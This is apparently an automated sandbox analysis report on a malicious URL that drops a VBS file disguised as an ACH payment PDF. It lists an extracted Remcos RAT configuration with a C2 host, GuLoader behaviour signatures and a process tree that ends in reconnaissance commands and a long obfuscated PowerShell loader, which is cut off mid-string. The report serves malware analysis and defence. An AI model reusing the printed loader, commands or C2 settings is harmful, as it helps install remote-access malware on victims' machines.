Analysis

  • max time kernel
    145s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/07/2023, 21:18

General

  • Target

    http://apexdailyjournal.com/

Malware Config

Extracted

Family

remcos

Botnet

Adobe-Crusher

C2

903b6a1b4bcf0f1d44494cf445debfc6e7f166ea9a7adds.crusherx1.site:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-H0FKWE

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 2 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://apexdailyjournal.com/
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2880
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xfc,0xd8,0x7ff844589758,0x7ff844589768,0x7ff844589778
      2⤵
        PID:1052
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:2
        2⤵
          PID:3800
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
          2⤵
            PID:2108
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2220 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
            2⤵
              PID:4876
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2736 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:1
              2⤵
                PID:1768
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2744 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:1
                2⤵
                  PID:1696
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4644 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:1
                  2⤵
                    PID:2652
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                    2⤵
                      PID:3244
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                      2⤵
                        PID:4764
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4056 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:1
                        2⤵
                          PID:4924
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                          2⤵
                            PID:4200
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5612 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:1
                            2⤵
                              PID:2196
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3816 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:1
                              2⤵
                                PID:4196
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4724 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                                2⤵
                                  PID:1364
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                                  2⤵
                                    PID:4616
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4736 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                                    2⤵
                                      PID:1320
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:8
                                      2⤵
                                        PID:5072
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\ACH Payment_USD 3480.pdf address 2023-07-13 .vbs"
                                        2⤵
                                        • Checks computer location settings
                                        PID:2232
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c dir
                                          3⤵
                                            PID:4628
                                          • C:\Windows\System32\cmd.exe
                                            cmd /c whoami&ipconfig&echo ###RSHELL.EXE###
                                            3⤵
                                              PID:212
                                              • C:\Windows\system32\whoami.exe
                                                whoami
                                                4⤵
                                                  PID:4484
                                                • C:\Windows\system32\ipconfig.exe
                                                  ipconfig
                                                  4⤵
                                                  • Gathers network information
                                                  PID:1440
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tjen = """SFSuNnoc t i oHnA PXSyDlUoFgFrAaMfEi e 1 1U { A HpUa r aSmE( [FSTt rEi n gB]U`$AG r u nreHr iS)K;l B`$ DPuUb sDd e a dDeVs R= H' 'P;U WJrkiCt eS-SH o sAt I`$FDBu b sMdOeKa d eUsO;O WSr iHtOeP-DHGoEsAt B`$TDnu bJsMdPeVa d e s ;I FW rViTtUem-MH oAs tG f`$UDPuCbSs dSeBa dceUs ;s H I`$NL e tFdTo w n sSgP P=W NTeFwP-CO b j e c t EbSyNtde [ ]H R(Q`$IGDr u n e rLi .BLSe n g tBhB T/ 2 )b;C E P SF oKr (N`$HTUaTmGk =B0S;H D`$ T a mNkU -NlAtE T`$ GDrPuCnUeSrDiI.IL ehn gLtHh ;f A`$ TFa m kB+ = 2P)L{I b`$ PSyDrDa l i d taa p S= S' sPuFb ' +A' sItDrVipnHgP' ;B `$VEenPg lHeKl i gBeGe M=P L`$ GVrMuSn eirci . `$ P yMrLaSl iLd tFa p . IHn vOoNkEeS(B`$ TUaCm kW, 2B)S;S R U D M t`$OLVeFtAdAoswPn sbg [ `$STSa mDkA/ 2 ]B = L[Sc oNnSvRe rKtB] : :iT oSBBy tKeS( `$FEPn g l eUl iVg eCeF,B S1U6C) ;P S L`$ SMaNnHdCsIi G= (G`$ LAe t dKo wUn ssgI[ `$ TTaUmSkM/S2 ]O - bLxmo r a1U1G2 )P;S N A`$dL eFtdd oRw n s gM[ `$ITSa mDkN/ 2P]P P= S`$ S aBnFdVs iV;D T E}M W[PSst rFiMnsg ] [USUySsEtGeEmM.DTMeBxKtN.SE nFc oPdKiBnTgf]T:S:RA S CSISIT. GTeDt SHtDrNiNnCgW(O`$SL e tVdPo wPn sBg )P;i}U`$LT rWisa sF0k=PX ySlOoEgMrga fNi e 1E1K ' 2C3R0U9T0F3V0S4P1D5 1 D 5 EU1P4S1 CD1LCd'F;S`$KTRrTi aDsC1 = XFy l oBg r aTfSiBe 1A1S ' 3LD 1Q9d1 3P0P2 1SFG0R3S1 F 1K6 0B4S5 E 2 7A1D9 1HE 4S3C4F2R5FEP2n5r1 EF0 3C1T1 1 6P1E5 3 E 1V1M0T4l1K9B0 6K1D5U3 DT1B5 0K4B1C8C1 Fl1 4I0 3 'e;S`$FT r i a sH2 =AXAyTlAoEg r aKfFi eV1S1B ' 3B7 1P5O0F4E2S0T0S2 1BF 1B3S3S1 1I4 1V4G0 2i1 5G0B3F0P3T'T;S`$ST r iPa s 3P= XAyOlAo g r aHf ifeC1H1C F'C2 3 0S9S0 3D0 4 1 5 1PD 5 ES2B2 0D5 1 E 0U4F1J9O1nD 1 5T5iEB3 9B1 E 0 4D1 5 0 2D1KF 0B0A2S3M1 5 0L2A0 6 1 9 1T3 1M5F0 3S5SEV3 8 1H1S1RE 1C4 1 C 1u5 2 2 1 5D1 6S' ; `$ TFrBiRaTsb4O=HXUyTlAoagDr aMfViVe 1 1A ' 0A3 0I4R0B2N1 9 1mE 1 7 'I;U`$FTTr i aTsB5O=MX yHl oqgGr a fRiBeF1T1R O' 3U7 1 5K0 4S3HD 1 FH1 4B0 5 1 CA1 5F3 8C1 1 1NEM1 4 1 CF1F5C'S;V`$ T rsiAaBs 6r=TX yIlOoGgArRa f i eS1D1F o'J2 2P2p4 2S3 0T0s1 5I1D3 1 9 1 1d1 C 3 EA1 1T1ED 1G5S5 C 5M0F3H8 1M9 1B4M1B5M3 2P0O9U2A3 1B9M1 7S5 C 5 0 2R0 0A5K1A2 1AC 1f9V1 3 'K;F`$ T rAiRa sS7C= X yUlKoAg r arf i eS1 1U N' 2A2K0T5U1CE 0S4P1 9 1ODP1D5F5SC 5b0 3 DA1C1 1 EP1 1K1M7S1 5M1b4O'D; `$ATRrSiPaEsO8 =RXIyDlRoRgTroa fRiUe 1 1 M' 2H2J1N5F1S6 1SCa1f5 1A3O0d4O1N5 1C4E3H4 1S5 1SCT1B5 1G7A1 1 0C4 1G5D'E;S`$ATOrPiLaDsS9 =TX ySlFoEgLrpaSfMi e 1 1 B'M3 9N1 EB3 D 1L5 1CD 1 F 0a2F0E9R3TDT1UFA1H4B0 5A1 CS1O5E' ;M`$ AKnDsCk uDeT0 =bX y lDo gHrcaMf iHeF1 1V 'P3 DS0L9 3s4N1 5h1 C 1 5A1 7D1 1N0 4o1 5 2 4 0R9C0F0C1N5U' ;U`$ A nFs kNuSeR1 =PXSySl o g r a f i eE1P1 A'T3R3 1HC 1 1 0I3E0E3T5 CP5T0 2C0 0 5L1 2J1KCM1E9J1 3 5 C 5R0 2a3C1T5N1n1K1 Cd1B5N1S4G5HC 5 0S3o1T1 EB0C3S1k9 3S3B1OCD1V1C0 3U0L3M5 C 5R0 3 1 0M5 0M4 1 FC3C3 1lCU1f1 0 3P0 3D'H; `$ A nNsqk u e 2P=TX yEl oLg r asf iSeb1 1 A' 3 9T1 E 0H6 1MFD1SBN1 5 'R;F`$IA nnsDktu e 3 =SX y lKoIgHrGaBf iHe 1F1M 'C2S0S0 5 1O2A1 CV1M9 1a3A5HC 5d0S3 8N1 9M1A4 1G5n3 2 0B9S2S3 1b9A1A7 5TCO5 0E3 EC1p5 0 7 2T3B1EC 1LF 0 4S5DC 5 0R2P6I1I9B0 2 0 4 0 5 1F1 1 CA'M;B`$FALnPs kUuIeH4T=FXKy l oAg r a f i eF1R1E S'C2 6R1A9O0 2T0A4P0d5U1U1 1KCI3A1 1 CM1 CL1 FA1O3 'D;I`$vAEnMsPk uNe 5 =RX yIl oRgFr a f i e 1A1I P'P1 EA0 4U1U4C1VC 1PC ' ;W`$FA n s kLuBe 6 =LXGySlIoTgRr aKf ileT1B1 'F3 E 0F4 2 0A0 2D1 Ff0P4C1 5O1 3 0 4O2 6 1U9 0f2F0F4 0S5 1B1D1 C 3DD 1 5S1CD 1 FD0E2 0T9D' ; `$FABn sSk u eG7R= X yFlEoLg r a f ime 1 1 'G3S9V3P5K2 8S'F;B`$ ASnSsYk ufe 8G= XRyrl oOg rTaAfUi et1S1 ' 2SC 'T;S`$GUKdAs pSaArSe nsd = XPyPlOo gVrsa fLiMeQ1 1V R' 2C5 2d3A3 5 2 2U4B3L4V2 'M;L`$ Hsa v eAr = XTyPlFoFgFr aAf iAeS1G1 ' 3 3T1V1S1 CL1 CS2 7S1 9w1 E 1M4 1 F 0C7 2s0c0 2 1SFC1R3R3A1G'M;BfPu nGcBtDi oDnG fOk pr b{ PAaSrBaOm R( `$ FSrIeKm ,A B`$ PPlTeUtIt eAn dAeGsC)S D B B;S`$SRTeSaalAi tE0S B= XPy lco gIrCaSfAiRe 1 1E D' 5D4S2S0U1CCR1 FE0I5B0B3D1 9 1 F 1 3S0c2D5C0U4 DK5O0 5S8R2PBB3 1E0T0E0 0 3G4 1AFE1 D 1 1M1 9S1 EW2HDK4hA 4LA 3 3 0 5o0u2 0 2 1F5S1FEU0U4 3 4S1PF 1TDC1A1 1 9L1AE 5PEC3 7P1 5 0 4 3D1a0S3S0F3I1 5 1 DR1C2 1PCK1B9 1F5e0 3k5 8 5 9C5R0 0 C 5A0N2F7 1 8U1 5 0 2B1S5 5JDG3 FS1P2 1AAS1H5 1F3 0F4Z5I0a0RB 5A0K5 4 2TFS5 E 3 7B1ACF1MFB1 2U1F1C1 C 3C1A0K3L0 3 1K5A1bD 1K2G1PCA0 9B3S3 1 1 1F3 1A8S1 5 5C0 5 D 3P1U1 E 1F4R5 0U5B4 2hF 5RE 3 Cn1 F 1F3P1a1 0 4D1 9 1 FL1BE 5WE 2B3 0R0K1RCC1P9T0Z4 5M8O5r4W3C1 1DE 0 3 1SB 0H5T1I5 4R8 5A9S2NBA5 DD4S1A2EDT5REP3 5 0s1F0 5G1P1S1SCB0b3O5v8 5A4A2 4 0 2 1M9 1p1A0 3B4 0 5D9R5 0M0SDB5D9U5HEK3H7 1U5 0N4N2H4O0 9 0P0 1 5 5B8 5L4U2A4 0 2 1 9f1o1P0F3 4b1A5J9S'S;U. (A`$ A n sSk uAeL7 )A `$ R e aPl i tY0 ;D`$SRAeAaSlCipt 5P = DX yUlSoFgRr aGfVi e 1 1U ' 5 4H3 4S1U5V1 D 0P9B1UER1 FD1 E 1 5 5 0L4 DT5S0 5P4T2P0N1BCT1 FU0D5Z0 3C1D9D1CF 1F3P0E2p5 EH3S7P1I5S0 4F3 Dr1 5U0 4S1 8K1FF 1M4D5 8M5 4A2B4F0 2 1B9 1 1 0N3D4P2K5SC 5I0A2BBL2D4G0 9L0H0P1 5U2 BA2 D 2 D 5 0 3 0T5 8i5 4K2 4O0 2P1 9r1D1L0 3B4 3N5CCK5T0U5 4S2 4A0 2I1 9 1 1A0A3 4 4R5v9U5O9 'K;F.F(B`$MAInFs kPuseP7 )s `$ RSeMa l iOtF5I; `$ERUe aLl i tM1T s= AXCyal oUg rMaSfAi eO1p1D A'L0V2 1 5G0N4P0 5M0S2 1 ER5C0K5E4I3 4P1 5S1TD 0E9Z1 E 1KFC1BEB1C5O5DE 3E9s1 EF0 6d1UF 1 BK1U5 5N8 5T4I1HE 0 5C1 C 1DCP5HCD5 0T3P0D5S8s2aB 2d3 0 9O0S3C0 4 1 5G1fD 5UE 2 2 0T5 1 E 0C4P1 9b1FDH1D5E5UE 3O9m1TEV0 4 1D5W0R2A1 FK0G0 2 3o1 5U0 2D0o6W1R9 1 3F1t5b0R3H5 ES3 8 1S1U1NE 1R4 1 C 1S5U2F2V1 5M1 6R2YDT5U8 3 EE1A5D0S7R5 DF3IF 1C2N1 A 1 5F1 3v0 4O5b0 2 3S0P9 0H3 0 4T1V5 1ED 5 EP2g2R0O5 1SE 0A4 1 9M1 DT1 5s5rEI3 9F1EES0 4I1p5s0 2 1EFI0 0 2O3W1P5L0 2F0 6s1B9S1 3 1 5K0N3u5RE 3E8T1 1 1PES1 4O1ACD1 5M2 2D1K5T1F6S5A8 5L8 3 E 1 5s0F7 5 DB3YFA1H2 1 A 1S5 1C3I0E4H5 0B3L9T1 EA0P4N2M0H0 4F0 2A5 9B5PCR5S0U5R8K5S4 2 0I1OCF1UFM0S5S0 3 1M9 1FF 1h3s0 2T5 E 3 7C1 5B0T4T3JDH1P5S0U4 1J8D1IFT1E4J5P8S5 4 2C4D0K2r1 9T1S1 0 3A4 5R5 9d5D9G5 E 3O9F1PE 0Z6A1BFA1RBR1J5F5 8P5A4 1GER0 5 1RCF1 CB5 CA5A0 3E0 5 8f5E4L3U6L0M2M1 5A1 D 5F9G5S9V5s9N5 9A5 CL5 0 5 4F2C0 1 CE1 5 0U4D0 4 1 5 1 E 1T4 1 5T0K3p5 9 5 9 'E; . (F`$ A nDs kAuTeS7E) M`$ REe aMlRidt 1 ; } f uPnMcUtOiSo n GGFDSTR A{ P aIrIaEmN B( [ PAa rFa m e tee rS( Pgo sFiCt itoNnU M= B0V,J AMSaDn dPa tFohrHy =E S`$BTKr u e ) ]T p[FTNyAp e [B]T] F`$ ZAeSl iOn eS,U[ P aNrTaWmMe tve rC( P oMs i t ibo n = 1U) ] D[GT yOp eP]I D`$AEJlFe n d i g eNsS A= N[GV oSiCd ]F) ; `$BR eFaDlSi tB2R W=A UXHyAlBo g rla fCiFeD1M1 ' 5S4 2A2D1D5 1 CF1T9P1N7 1U9 1SF 5E0L4 Dg5S0T2 B 3 1 0 0K0 0S3F4G1PFB1 Dh1 1m1I9G1lEK2ADC4gAM4KAM3t3f0 5S0R2B0 2M1 5K1HEn0 4R3 4d1PFA1 DE1U1S1P9A1 E 5 EE3F4T1L5 1 6 1 9 1UES1 5S3 4U0 9R1CEU1 1 1KD 1 9t1b3C3P1 0G3O0J3F1 5F1FDS1 2 1OC 0R9G5 8T5R8R3sEa1 5U0B7S5tDO3DF 1 2 1 AT1 5L1P3A0 4 5t0T2T3A0U9 0B3N0K4 1S5C1 Da5 E 2 2 1B5 1N6 1ICt1d5 1 3 0 4A1 9D1gF 1SER5AEL3s1S0S3S0F3E1M5P1UDW1H2A1 CP0P9D3SE 1f1T1 D 1N5T5 8 5S4I2 4 0 2M1 9F1E1S0V3 4P8R5 9 5M9r5UCS5G0 2SBO2 3 0S9 0C3U0U4H1 5N1BD 5UEA2O2S1 5W1b6S1 CK1R5D1 3 0 4P1 9D1SF 1NER5hEF3 5S1DDC1 9 0D4V5 E 3f1K0C3A0S3P1F5 1 D 1P2U1 C 0H9D3S2 0R5V1S9 1CCS1g4 1P5S0F2T3C1 1 3R1A3 1 5 0V3 0F3D2 DD4BAF4GAD2 2I0L5S1 E 5T9T5CEM3R4K1C5L1S6 1F9G1 EM1 5B3S4M0A9U1FE 1 1 1YDV1B9 1 3F3CD 1DF 1K4S0I5P1OCA1S5S5 8C5U4s2G4E0G2P1T9 1B1K0W3P4C9R5 CD5 0S5 4D1K6 1H1S1SC 0I3 1 5b5S9 5SES3T4S1N5T1 6 1M9S1 EV1K5A2 4A0S9A0P0R1U5S5 8D5L4O3O1F1 Ef0 3C1BBB0S5V1 5M4D0I5 CR5L0 5T4O3 1C1AE 0 3S1 BS0U5 1 5M4 1 5OC 5F0 2EBP2C3H0K9 0S3 0 4P1y5T1 DD5REC3LDi0S5A1TCD0B4P1N9M1 3S1 1D0P3K0 4 3E4S1 5 1KCM1M5A1 7H1A1E0Q4D1S5G2 D 5S9 'M;V.A(L`$SAUnPsSk uUeT7R) C`$ RAeFa lKiHt 2 ;O`$HRueFaClVi tB3 =h SXSyCl oMgCrSaBfLiAeO1D1T D' 5B4 2V2L1 5H1TC 1B9M1D7L1 9 1 F 5MEB3 4C1 5U1 6 1 9T1SEk1 5 3H3S1 FA1SET0 3 0 4 0C2F0 5 1K3 0 4B1 F 0T2 5S8 5O4S2T4L0L2P1A9 1M1 0 3 4K6B5 CV5 0 2SB 2 3B0S9Z0 3c0 4 1T5H1DD 5 E 2S2 1 5 1l6 1SCA1V5 1A3S0U4N1 9A1 F 1 E 5RES3 3T1 1S1 CU1IC 1B9B1 EM1 7F3 3B1OFF1 ED0O6 1 5B1TEC0L4U1R9 1MFE1EEA0s3S2 DS4 A 4SA 2 3U0 4 1B1M1cEP1 4N1H1D0D2T1A4E5SCE5 0F5L4R2WAa1W5T1 CD1 9 1 EI1 5 5 9T5 EP2C3 1 5T0S4B3H9F1UDR0 0f1FCD1d5C1 D 1B5D1 E 0 4N1 1A0 4 1N9B1PF 1FEN3 6H1 CC1 1C1 7 0 3O5T8 5S4S2R4A0S2 1 9 1M1S0W3S4 7e5L9N' ;m.P( `$ ARn s kDu eH7G) O`$ R e a lAiJtA3D; `$MR eSabl iSt 4B = XCyPl o gVr aHf i e 1s1I G'H5R4C2S2 1A5o1CC 1N9K1U7 1A9S1NF 5FE 3F4D1S5S1M6o1C9 1PE 1E5 3 D 1R5S0 4 1W8I1 F 1 4 5k8P5S4U3S1 1KE 0P3 1 BM0M5S1S5S4 2H5 CF5T0K5 4H3B1K1 EV0 3S1SB 0 5P1 5W4 3 5 CU5 0V5b4E3H5P1PCG1 5 1GEt1G4P1 9 1S7C1 5 0M3D5SCG5M0U5 4F2HAP1E5H1SC 1T9 1SEL1 5 5G9U5bET2R3m1 5 0 4F3 9 1ED 0P0 1 CD1K5K1 Dr1K5M1 EV0 4 1A1 0 4r1 9A1SFE1 E 3 6 1 C 1 1 1T7H0 3T5P8T5U4P2 4D0 2r1S9D1C1G0 3P4A7M5 9 'B; .J( `$LAFnRs k uTeN7B)I K`$ R eDa lUi t 4 ;K`$SRFe aTlMiAt 5I N=N RXHy lPoRgLrCaKfDiSeH1 1 p'S0S2K1 5R0 4 0a5 0A2B1 E 5D0 5T4T2C2p1J5 1 CH1 9 1V7 1O9i1 F 5DE 3 3 0 2 1R5 1 1 0 4 1V5U2N4S0 9 0 0I1S5A5P8G5 9N' ; .S(O`$ ANnOs kBuTe 7K) `$ RDeSa lEi tP5M M; } `$BS k y lSi t n eBos I= GXLyblDoBg rRaTf i e 1a1 'K1MBH1P5 0I2T1LE 1 5 1sC 4Y3 4G2K' ;R`$SXFyFlAo g rGaRf iue 0M3t D=E SXSyMlBoLgUrBaKfAi e 1 1s 'T3 7S1 5P0U4 3 3 1 FC1lEF0F3 1VFK1pCH1G5B2n7U1 9 1 EA1 4R1MFV0M7S'F; `$ XMyPl oEgVrKaBfSiPeS0 0B=MX yRlDo g rIaNf i eb1C1P ' 2 3 1A8s1 FB0S7 2P7 1 9J1MEC1a4 1FF 0P7 ' ; `$PX yAlSo gPrGa fSizeG0D1R E= HX ySlfo gTriaUf iSe 1 1 F'a5B4H3 6R1 5C0 2 0 6B1 9 1 4f5S0 4 D 5K0B2UB 2a3S0A9 0 3 0 4 1S5s1 DE5UE 2C2 0B5B1FEt0B4F1D9F1SD 1D5B5SE 3 9K1 E 0 4U1K5 0I2a1HFU0F0E2A3L1S5 0I2 0X6 1c9 1 3 1S5B0H3 5 ET3 DP1 1 0E2 0b3s1T8 1H1P1 CV2 D 4RA 4kAN3V7D1u5S0G4 3 4 1 5C1 CB1 5 1T7 1Q1 0L4 1V5 3 6 1 F 0L2V3P6m0 5H1SE 1 3D0E4p1S9R1 FB1 E 2 0 1 FB1 9A1OED0S4 1U5 0O2A5H8 5O8N1D6 1SB 0 0 5 0i5 4 2A5S1 4U0E3M0N0O1 1 0 2A1s5S1RE 1 4B5F0 5S4 2V8J0 9 1UCB1 F 1R7 0 2H1M1S1 6c1C9F1C5P4S0K4O0b5J9 5 Cc5K0S5 8T3S7 3 4K2O4 5 0E3 0U5P8T2LB 3 9D1PEU0 4H2 0j0C4 0F2H2SD 5GCV5M0C2 BB2C5B3W9U1NED0K4 4B3A4M2 2PDG5 9C5 0S5S8T2 BS3I9v1 EF0D4A2U0N0 4U0G2M2SD 5H9 5T9 5 9 ' ;F.S( `$uASnCs kEu e 7M)S `$ XCyTlBo gBr aGf i eJ0B1B;A`$LXUyTl oAg rSaDfIi e 0 2S =B X y l o gBr a fDiCe 1I1L S' 5 4A2F6 1U5 1I4c1TB 1M5p5 0F4SD 5U0C2 B 2 3D0 9 0I3V0O4 1N5I1 DG5CEF2E2F0E5H1SE 0 4 1T9T1RD 1 5F5 E 3A9t1 E 0 4R1 5F0 2R1KF 0K0S2A3 1G5H0s2 0U6 1G9M1r3 1D5R0 3a5RE 3 DP1E1V0b2 0 3R1E8R1h1 1DCE2 DI4MAE4TAK3S7 1T5 0i4H3I4 1S5m1 CR1T5T1 7S1 1B0 4D1p5C3S6U1GF 0 2 3 6C0u5B1 EN1 3D0 4 1 9P1 F 1 ET2 0 1PF 1 9n1 E 0C4 1P5 0S2F5L8M5F8 1D6L1 B 0 0 5 0D5M4I2 3B1 B 0C9 1 C 1 9 0S4S1TEZ1 5S1 FS5 0S5G4I2 8 0C9 1 CM1hFL1 7L0G2I1A1P1T6P1S9 1 5 4 0 4 3m5C9 5LCI5M0 5 8I3s7D3 4 2 4K5H0 3M0 5 8 